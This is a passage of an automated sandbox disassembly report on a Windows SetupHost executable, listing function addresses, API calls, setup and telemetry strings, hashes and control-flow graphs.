                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$AllocateCheckFreeInitializeMembershipToken
                                                                                                                        • String ID: WdsSetupLogInit
                                                                                                                        • API String ID: 1125035699-3317556560
                                                                                                                        • Opcode ID: 2c04d27c09ab7751f0bb7337f0f6f2338ae709f93b9f9b2ef9b7f781f14e69c8
                                                                                                                        • Instruction ID: 206816dde56415ffbb203d0d40b3e55463de6e18bc1d62ef1d7a6c6d7caec639
                                                                                                                        • Opcode Fuzzy Hash: 2c04d27c09ab7751f0bb7337f0f6f2338ae709f93b9f9b2ef9b7f781f14e69c8
                                                                                                                        • Instruction Fuzzy Hash: E2110074A0431DAFDB04DFA0EC899BE7BB8FB08355F100469E902E2291D7309E08DA65
                                                                                                                        Function 0053DC8E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 45libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,00000000), ref: 0053DCA1
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0053DCA8
                                                                                                                        • GetNativeSystemInfo.KERNEL32 ref: 0053DCC0
                                                                                                                        • GetSystemInfo.KERNEL32(?), ref: 0053DCC4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoSystem$AddressHandleModuleNativeProc
                                                                                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                        • API String ID: 3433367815-192647395
                                                                                                                        • Opcode ID: e6e884ee54a341e76d1bd4883864e53cb61cbc0b613fa1663477f89c7fbf842e
                                                                                                                        • Instruction ID: 3607d4ac26d9a12294a6e3a9acfa58a16de6ac7a5163c5887e5080ac70e0fbba
                                                                                                                        • Opcode Fuzzy Hash: e6e884ee54a341e76d1bd4883864e53cb61cbc0b613fa1663477f89c7fbf842e
                                                                                                                        • Instruction Fuzzy Hash: DFF0627169421C92CB2213697D1DAAE3FB8B748757F241953F903D21D0D9D0CC45D2B5
                                                                                                                        Function 004E7ACA Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101nativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • NtPowerInformation.NTDLL(00000042,00000000,00000000,?,00000001), ref: 004E7B4C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InformationPower
                                                                                                                        • String ID: CSystemHelper::CheckConnectedStandby$SetupUI: Connected standby: [%s]$SetupUI: Detecting connected standby capability...$Yes
                                                                                                                        • API String ID: 33107167-1862664920
                                                                                                                        • Opcode ID: d46782189e1f16f0dea775074dc7e9b973dc6dcc45cd5d16e53cf8906f09d4f5
                                                                                                                        • Instruction ID: b9419dc8d9ad78304ee8bfc259506c96b916daf9d0517568ef32b5d0aec51fb7
                                                                                                                        • Opcode Fuzzy Hash: d46782189e1f16f0dea775074dc7e9b973dc6dcc45cd5d16e53cf8906f09d4f5
                                                                                                                        • Instruction Fuzzy Hash: 6931E6B0B04208AFDF04A7699C6DF3EBBA5DF88725F04805FE80697381DE78AD059759
                                                                                                                        Function 0054B274 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 77nativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • NtQueryLicenseValue.NTDLL(00553190,00000000,00000000,00000004,00000000), ref: 0054B320
                                                                                                                        Strings
                                                                                                                        • ConfigureTelemetryOptInSettingsUx, xrefs: 0054B2AB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LicenseQueryValue
                                                                                                                        • String ID: ConfigureTelemetryOptInSettingsUx
                                                                                                                        • API String ID: 22271514-4247868660
                                                                                                                        • Opcode ID: 651c641b8809e3fd97c5f32b86807bce9032eb7e5309d518ab744589da7c7c28
                                                                                                                        • Instruction ID: 51fe807b25727bc59512fe34ad94ec9ba7fd159b39afa3ccf8c3b9c237eb3313
                                                                                                                        • Opcode Fuzzy Hash: 651c641b8809e3fd97c5f32b86807bce9032eb7e5309d518ab744589da7c7c28
                                                                                                                        • Instruction Fuzzy Hash: 9521AC79D0421AABEB21CF99C8547EEBFF4FB84319F00096AD551A2284E7B0DA84DB51
                                                                                                                        Function 0054B1B1 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressFreeLicenseLoadProcQueryValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3617071427-0
                                                                                                                        • Opcode ID: 80fd118ea5101af6f24b68b65a0e4b7a395437a6efb102fcd36acb4966aef7e4
                                                                                                                        • Instruction ID: 908ace2e4907e17a4fa6fa8c3656b1289d2b781a0e7a68e0d558f87e6cbcbff1
                                                                                                                        • Opcode Fuzzy Hash: 80fd118ea5101af6f24b68b65a0e4b7a395437a6efb102fcd36acb4966aef7e4
                                                                                                                        • Instruction Fuzzy Hash: 3521B479E0D309ABEB218B94C4547EEBFF4BB80748F14406AD841A7291EBF5CE89C751
                                                                                                                        Function 004FA6C1 Relevance: 70.6, APIs: 8, Strings: 32, Instructions: 588COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 288 4fa6c1-4fa793 call 54f3e6 291 4fa7ac-4fa7c7 call 4fc419 288->291 292 4fa795-4fa7a4 call 4f8a19 288->292 297 4fa7c9 291->297 298 4fa7e2-4fa7fb call 4fc159 291->298 295 4fa7a9 292->295 295->291 300 4fa7ce-4fa7d1 297->300 303 4fa7fd-4fa806 298->303 304 4fa808-4fa810 298->304 302 4fa7d3-4fa7dd call 4f8ab5 300->302 309 4fae05-4fae27 call 4f9d9c call 4eee5d 302->309 303->302 306 4fa829-4fa834 304->306 307 4fa812-4fa81b call 4f8a19 304->307 311 4fa887 306->311 312 4fa836-4fa83b 306->312 314 4fa820-4fa826 307->314 330 4fae29-4fae32 call 4f9b21 309->330 331 4fae38-4fae44 309->331 313 4fa88c-4fa88e 311->313 315 4fa841-4fa84e 312->315 317 4fa89a-4fa8be call 4e1bc9 313->317 318 4fa890-4fa895 313->318 314->306 315->315 319 4fa850-4fa858 315->319 327 4fa8ca-4fa8d2 317->327 328 4fa8c0-4fa8c5 317->328 318->300 319->311 322 4fa85a-4fa87f call 548732 319->322 322->318 338 4fa881-4fa885 322->338 336 4fa8eb-4fa902 call 4fc419 327->336 337 4fa8d4-4fa8dd call 4f8a19 327->337 335 4fadf3 328->335 330->331 333 4fae46-4fae4f call 4f9b21 331->333 334 4fae55-4fae61 331->334 333->334 341 4fae63-4fae6c call 4f9b21 334->341 342 4fae72-4fae7e 334->342 343 4fadf5-4fadfa call 4f8ab5 335->343 356 4fa917-4fa930 call 4fb1d4 336->356 357 4fa904 336->357 349 4fa8e2-4fa8e8 337->349 338->313 341->342 350 4fae8f-4fae9b 342->350 351 4fae80-4fae89 call 4f9b21 342->351 354 4fadff 343->354 349->336 358 4fae9d-4faea6 call 4f9b21 350->358 359 4faeac-4faeb2 350->359 351->350 354->309 370 4fa97b-4fa994 call 4fb1d4 356->370 371 4fa932-4fa93c 356->371 365 4fa909-4fa90f 357->365 358->359 362 4faec5 359->362 363 4faeb4-4faec3 call 4f9b21 359->363 369 4faec7-4faed3 362->369 363->369 365->356 373 4faed5-4faedc call 4f9b21 369->373 374 4faee2-4faeee 369->374 394 4fa996-4fa9a0 370->394 395 4fa9e2-4faa1f memset RtlGetVersion call 4f9ca1 370->395 375 4fa93e-4fa94e call 4f8a19 371->375 376 4fa956-4fa972 call 4fc419 371->376 373->374 378 4faefd-4faf03 374->378 379 4faef0-4faef7 call 4f9b21 374->379 391 4fa953 375->391 376->370 402 4fa974-4fa979 376->402 381 4faf05-4faf0c call 4f9b21 378->381 382 4faf12-4faf1e 378->382 379->378 381->382 389 4faf2b-4faf4d call 4fb721 call 4eee5d call 54f3a4 382->389 390 4faf20-4faf25 call 4f9b21 382->390 390->389 391->376 396 4fa9ba-4fa9d6 call 4fc419 394->396 397 4fa9a2-4fa9b2 call 4f8a19 394->397 411 4faa31-4faa56 GetProductInfo 395->411 412 4faa21-4faa27 395->412 396->395 413 4fa9d8-4fa9dd 396->413 408 4fa9b7 397->408 402->365 408->396 415 4faadf-4faaf8 call 4fb1d4 411->415 416 4faa5c-4faa83 call 4e1bc9 411->416 412->411 413->365 425 4faafa-4fab04 415->425 426 4fab40-4fab59 call 4fb1d4 415->426 423 4faa85-4faa9c call 4f8ab5 416->423 424 4faaa1-4faaa9 416->424 423->309 430 4faaab-4faab4 call 4f8a19 424->430 431 4faac2-4faad3 call 4fc419 424->431 427 4fab1e-4fab34 call 4fc419 425->427 428 4fab06-4fab16 call 4f8a19 425->428 443 4fab5b-4fab65 426->443 444 4faba1-4fabb0 call 53e6d5 426->444 427->426 446 4fab36 427->446 439 4fab1b 428->439 441 4faab9-4faabf 430->441 431->415 447 4faad5 431->447 439->427 441->431 448 4fab7f-4fab95 call 4fc419 443->448 449 4fab67-4fab7c call 4f8a19 443->449 454 4fabbc-4fabec call 4e1bc9 444->454 455 4fabb2 444->455 446->426 447->415 448->444 457 4fab97 448->457 449->448 460 4fabee 454->460 461 4fabf8-4fac12 call 4f93b4 454->461 455->454 457->444 460->461 464 4fac1e-4fac37 call 4fb1d4 461->464 465 4fac14 461->465 468 4fac6d-4fac83 464->468 469 4fac39-4fac61 call 4fb721 call 4f93b4 464->469 465->464 471 4fac96-4fac9e 468->471 472 4fac85-4fac8c 468->472 469->468 486 4fac63 469->486 473 4facd2-4facd4 471->473 474 4faca0-4faca2 471->474 472->471 478 4facde 473->478 479 4facd6-4facdc 473->479 476 4facaa 474->476 477 4faca4-4faca8 474->477 481 4facac-4facc4 call 4f8a19 476->481 477->481 482 4face0-4fad33 _wtoi * 4 call 4fc50b 478->482 479->482 487 4facc9-4faccf 481->487 489 4fad3f-4fad4e call 53e7c8 482->489 490 4fad35 482->490 486->468 487->473 493 4fad5a-4fad73 call 4fb1d4 489->493 494 4fad50 489->494 490->489 497 4fadad 493->497 498 4fad75-4fad94 call 4ff6d6 call 4f8af9 493->498 494->493 500 4fadb3-4fadbd 497->500 498->500 511 4fad96-4fadab 498->511 502 4fadbf-4fadca call 4f8a19 500->502 503 4fadd2-4fade3 call 4fc419 500->503 507 4fadcf 502->507 503->354 510 4fade5-4fadf0 503->510 507->503 510->335 511->343
                                                                                                                        APIs
                                                                                                                        • memset.MSVCRT ref: 004FA9F1
                                                                                                                        • RtlGetVersion.NTDLL ref: 004FAA0A
                                                                                                                        • GetProductInfo.KERNEL32(?,?,?,?,?), ref: 004FAA4E
                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 004FA6CB
                                                                                                                          • Part of subcall function 004F8A19: __EH_prolog3.LIBCMT ref: 004F8A20
                                                                                                                          • Part of subcall function 004FC159: __EH_prolog3_GS.LIBCMT ref: 004FC163
                                                                                                                          • Part of subcall function 004FC159: memset.MSVCRT ref: 004FC188
                                                                                                                          • Part of subcall function 004FB1D4: RegQueryValueExW.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000001,00000000,00000000,00000000), ref: 004FB216
                                                                                                                          • Part of subcall function 004FB1D4: GetProcessHeap.KERNEL32(00000000,?), ref: 004FB237
                                                                                                                          • Part of subcall function 004FB1D4: HeapAlloc.KERNEL32(00000000), ref: 004FB23E
                                                                                                                          • Part of subcall function 004FB1D4: GetProcessHeap.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 004FB29E
                                                                                                                          • Part of subcall function 004FB1D4: HeapFree.KERNEL32(00000000), ref: 004FB2A5
                                                                                                                          • Part of subcall function 004FB1D4: RegCloseKey.KERNEL32(00000000,00000001,00000000,00000000,00000000), ref: 004FB2B4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$H_prolog3_Processmemset$AllocCloseFreeH_prolog3InfoProductQueryValueVersion
                                                                                                                        • String ID: %d.%d.%d.%d$%lu$CMoSetupOneSettingsHelperT<class CEmptyType>::AddQueryStringParameters$EditionId$InstallationType$MachineId$OneSettings: AppVer [%s.%s.%s.%s]$OneSettings: Branch [%s]$OneSettings: DeviceId [%s]$OneSettings: EditionId [%s]$OneSettings: InstallationType [%s]$OneSettings: OS [%s]$OneSettings: OsVer [%s]$OneSettings: Ring [%s]$OneSettings: ScenarioId [%s]$OneSettings: Sku [%s]$OneSettingsBranch$OneSettingsVersion$Ring$SOFTWARE\Microsoft\SQMClient$SOFTWARE\Microsoft\Windows NT\CurrentVersion$SOFTWARE\Microsoft\WindowsSelfHost\Applicability$SYSTEM\Setup\MoSetup$appBuildLab$deviceId$osver$platformEdition$platformInstallationType$ring$scenarioId$sku$windows
                                                                                                                        • API String ID: 3255902165-1952152101
                                                                                                                        • Opcode ID: 8cc4a4232c9d3d5761d978cae27d4cadef82c00c5dcc81da94d9032461e59ba0
                                                                                                                        • Instruction ID: fc2cae794f69ac0e03c78d9bd8a6a154bb1164ff629a0a41158603043f11886f
                                                                                                                        • Opcode Fuzzy Hash: 8cc4a4232c9d3d5761d978cae27d4cadef82c00c5dcc81da94d9032461e59ba0
                                                                                                                        • Instruction Fuzzy Hash: 3F3292B0B0031D9BDB559E65CC85BFA77B5AB48304F1040EEE60CA7282DBB89E54CF59
                                                                                                                        Function 004EAFD5 Relevance: 58.3, APIs: 8, Strings: 25, Instructions: 532memoryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 512 4eafd5-4eb014 call 54f3b3 515 4eb016-4eb022 512->515 516 4eb073-4eb07f 512->516 523 4eb024-4eb03d call 4f8a19 515->523 524 4eb045-4eb05d GetProcessHeap HeapAlloc 515->524 521 4eb0a2-4eb0a9 516->521 522 4eb081-4eb09f call 4f8a19 516->522 521->524 527 4eb0ab-4eb0d6 call 4f8ab5 521->527 522->521 544 4eb042 523->544 525 4eb05f-4eb071 524->525 526 4eb0d8 524->526 528 4eb0da-4eb0e4 call 4fa0e8 525->528 526->528 548 4eb129-4eb140 527->548 537 4eb0ea 528->537 538 4eb0e6-4eb0e8 528->538 542 4eb0ec-4eb0f8 537->542 538->542 546 4eb0fe-4eb11a 542->546 547 4eb1bc-4eb201 call 4f7fb1 call 4f836f 542->547 544->524 554 4eb11c-4eb11e call 4f8ab5 546->554 570 4eb203 547->570 571 4eb221-4eb229 547->571 559 4eb142-4eb15b 548->559 560 4eb160-4eb16e call 4f9d9c 548->560 561 4eb123 554->561 559->560 568 4eb179-4eb17d 560->568 569 4eb170-4eb173 SysFreeString 560->569 565 4eb126 561->565 565->548 572 4eb17f-4eb182 SysFreeString 568->572 573 4eb188-4eb18a 568->573 569->568 574 4eb208-4eb216 570->574 575 4eb22b-4eb230 571->575 576 4eb232-4eb241 571->576 572->573 577 4eb18c-4eb18d SysFreeString 573->577 578 4eb193-4eb195 573->578 587 4eb21a-4eb21c 574->587 575->574 588 4eb275-4eb279 576->588 589 4eb243-4eb24c 576->589 577->578 580 4eb19e-4eb1a3 578->580 581 4eb197-4eb198 SysFreeString 578->581 583 4eb1ac-4eb1bb call 4fa0e8 call 54f390 580->583 584 4eb1a5-4eb1a6 SysFreeString 580->584 581->580 584->583 587->554 588->561 594 4eb27f-4eb29e call 4f9d9c call 4f82e4 588->594 591 4eb24e 589->591 592 4eb253-4eb26d call 4f8a19 589->592 591->592 608 4eb272 592->608 602 4eb2c0-4eb2c9 594->602 603 4eb2a0-4eb2a7 594->603 606 4eb2cf-4eb2e1 call 4f8477 602->606 607 4eb379-4eb38e call 4f83fa 602->607 605 4eb2aa-4eb2bb 603->605 605->587 616 4eb2f2-4eb304 call 4f858f 606->616 617 4eb2e3-4eb2ec 606->617 614 4eb39f-4eb3b1 call 4f83fa 607->614 615 4eb390-4eb399 607->615 608->588 625 4eb3c2-4eb3d4 call 4f858f 614->625 626 4eb3b3-4eb3bc 614->626 615->614 623 4eb33b-4eb34d call 4f858f 616->623 624 4eb306-4eb327 call 4f7c36 616->624 617->616 623->607 637 4eb34f-4eb370 call 4f7c36 623->637 633 4eb338-4eb33a 624->633 634 4eb329 624->634 635 4eb3d6-4eb3f6 call 4f7c36 625->635 636 4eb422 625->636 626->625 633->623 639 4eb32e-4eb333 634->639 638 4eb425-4eb42c 635->638 648 4eb3f8-4eb41d call 4f8ab5 635->648 636->638 637->607 649 4eb372-4eb377 637->649 642 4eb42e-4eb440 call 4f8477 638->642 643 4eb455-4eb467 call 4f83fa 638->643 639->605 642->643 652 4eb442-4eb44f 642->652 653 4eb47c-4eb48e call 4f83fa 643->653 654 4eb469-4eb476 643->654 648->565 649->639 652->643 659 4eb4a3-4eb4b5 call 4f83fa 653->659 660 4eb490-4eb49d 653->660 654->653 665 4eb4ca-4eb4dc call 4f83fa 659->665 666 4eb4b7-4eb4c4 659->666 660->659 669 4eb4de-4eb4eb 665->669 670 4eb4f1-4eb503 call 4f83fa 665->670 666->665 669->670 673 4eb518-4eb52a call 4f83fa 670->673 674 4eb505-4eb512 670->674 677 4eb53f-4eb546 673->677 678 4eb52c-4eb539 673->678 674->673 679 4eb57b-4eb582 677->679 680 4eb548-4eb55a call 4f8477 677->680 678->677 682 4eb588-4eb59a call 4f83fa 679->682 683 4eb611-4eb618 679->683 680->679 690 4eb55c-4eb575 680->690 682->683 697 4eb59c-4eb5a5 682->697 686 4eb61a-4eb62c call 4f8477 683->686 687 4eb641-4eb648 683->687 686->687 698 4eb62e-4eb63b 686->698 688 4eb64a-4eb65c call 4f8477 687->688 689 4eb671-4eb678 687->689 688->689 704 4eb65e-4eb66b 688->704 695 4eb67a-4eb68c call 4f8477 689->695 696 4eb6a1-4eb6a8 689->696 690->679 695->696 709 4eb68e-4eb69b 695->709 696->565 703 4eb6ae-4eb6c0 call 4f83fa 696->703 701 4eb5ac-4eb5b3 697->701 702 4eb5a7-4eb5aa 697->702 698->687 706 4eb5d3-4eb5e7 701->706 707 4eb5b5-4eb5bc 701->707 702->701 702->706 703->565 712 4eb6c6-4eb6d9 703->712 704->689 715 4eb60e 706->715 716 4eb5e9-4eb60b call 4f8a19 706->716 707->706 710 4eb5be-4eb5d1 707->710 709->696 710->683 712->565 715->683 716->715
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004EAFDC
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,0000001C), ref: 004EB049
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 004EB050
                                                                                                                          • Part of subcall function 004F8A19: __EH_prolog3.LIBCMT ref: 004F8A20
                                                                                                                          • Part of subcall function 004F858F: __EH_prolog3.LIBCMT ref: 004F8596
                                                                                                                          • Part of subcall function 004F858F: SysFreeString.OLEAUT32(00000000), ref: 004F86B4
                                                                                                                          • Part of subcall function 004F858F: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004F86C1
                                                                                                                          • Part of subcall function 004F858F: HeapFree.KERNEL32(00000000), ref: 004F86C8
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 004EB173
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 004EB182
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 004EB18D
                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 004EB198
                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 004EB1A6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Free$String$Heap$H_prolog3$Process$Alloc
                                                                                                                        • String ID: COMPACTOSENABLED$CSetupHost::InitializeOneSettings$DIAGNOSTICANALYSISENABLED$DIAGNOSTICANALYSISTIMEOUT$DOWNLOADFREESPACEPADDING$DOWNLOADFREESPACEREQUIRED$DUCATEGORIES_FLAG$DUCHANNELS_FLAG$EXTERNALFREESPACEPADDING$EXTERNALFREESPACEREQUIRED$FACILITATORURL$MIGNEOENABLED$MIGROLLBACKENABLED$POSTUPGRADEFREESPACEPERCENTAGE$POSTUPGRADEFREESPACEREQUIRED$PRIORITYLEVEL$SetupHost: Attempting to initialize OneSettings values$SetupHost: Ignoring priority setting.$SetupHost: OneSettings Initialized -> [%s]$SetupHost: Skipping OneSettings initialization for Azure Host$UNINSTALLENABLED$UPDATEMEDIAENABLED$UPDATEMEDIAMCTLINK$UPDATEMEDIASETUPVERSION$Yes
                                                                                                                        • API String ID: 3733136790-3700976932
                                                                                                                        • Opcode ID: 32ac1e5fbbf44e11a18155ea01e28bc98c22d3239a54551cfce12944b8fcf910
                                                                                                                        • Instruction ID: ca9fd0c56a828e583d02fcb2fea54227b3b61232b8e5c7cd505a30eb3cd1d112
                                                                                                                        • Opcode Fuzzy Hash: 32ac1e5fbbf44e11a18155ea01e28bc98c22d3239a54551cfce12944b8fcf910
                                                                                                                        • Instruction Fuzzy Hash: C822AF74A002189BCF04DF66D895BAEBBB5EF48315F14406FED05AB391DF389805CBA8
                                                                                                                        Function 0054AAD9 Relevance: 45.7, APIs: 12, Strings: 14, Instructions: 188libraryloaderCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 721 54aad9-54ab0f LoadLibraryExW 722 54ab31 721->722 723 54ab11-54ab2f GetProcAddress * 2 721->723 724 54ab34-54ab44 722->724 723->724 725 54ab46-54ab48 724->725 726 54abb0-54abc1 _wcsicmp 724->726 725->726 729 54ab4a-54ab6e 725->729 727 54ac41-54ac68 RegGetValueW 726->727 728 54abc3-54abd3 _wcsicmp 726->728 732 54ac75 727->732 733 54ac6a-54ac73 727->733 730 54abd5-54abda 728->730 731 54abdc-54abec _wcsicmp 728->731 745 54ab70-54ab74 729->745 730->727 734 54abf5-54ac06 _wcsicmp 731->734 735 54abee-54abf3 731->735 737 54ac77 732->737 738 54ac7d-54ac86 732->738 733->732 734->727 741 54ac08-54ac19 _wcsicmp 734->741 735->727 737->738 739 54ac96-54ac98 738->739 740 54ac88-54ac8c 738->740 742 54acb6-54acbb 739->742 743 54ac9a-54acaa 739->743 740->739 741->727 744 54ac1b-54ac2c _wcsicmp 741->744 747 54acc4-54acc6 742->747 748 54acbd-54acbe FreeLibrary 742->748 743->742 761 54acac-54acb1 call 54b9c5 743->761 744->727 746 54ac2e-54ac3f _wcsicmp 744->746 745->738 749 54ab7a-54ab7f 745->749 746->727 751 54ac8e-54ac91 746->751 752 54acd2-54acd8 747->752 753 54acc8-54accd call 54b339 747->753 748->747 754 54aba6-54abab 749->754 755 54ab81-54ab85 749->755 751->739 753->752 754->739 757 54ab87-54ab8a 755->757 758 54ab8f-54ab95 755->758 757->739 758->754 759 54ab97-54aba1 758->759 759->739 761->742
                                                                                                                        APIs
                                                                                                                        • LoadLibraryExW.KERNEL32(policymanager.dll,00000000,00000800,00000000,00000003,00000001,?,0054ADCD,00000000,00000000,?,00000000,0054B215), ref: 0054AB02
                                                                                                                        • GetProcAddress.KERNEL32(00000000,PolicyManager_GetPolicy), ref: 0054AB17
                                                                                                                        • GetProcAddress.KERNEL32(00000000,PolicyManager_FreeGetPolicyData), ref: 0054AB26
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 0054ACBE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryProc$FreeLoad
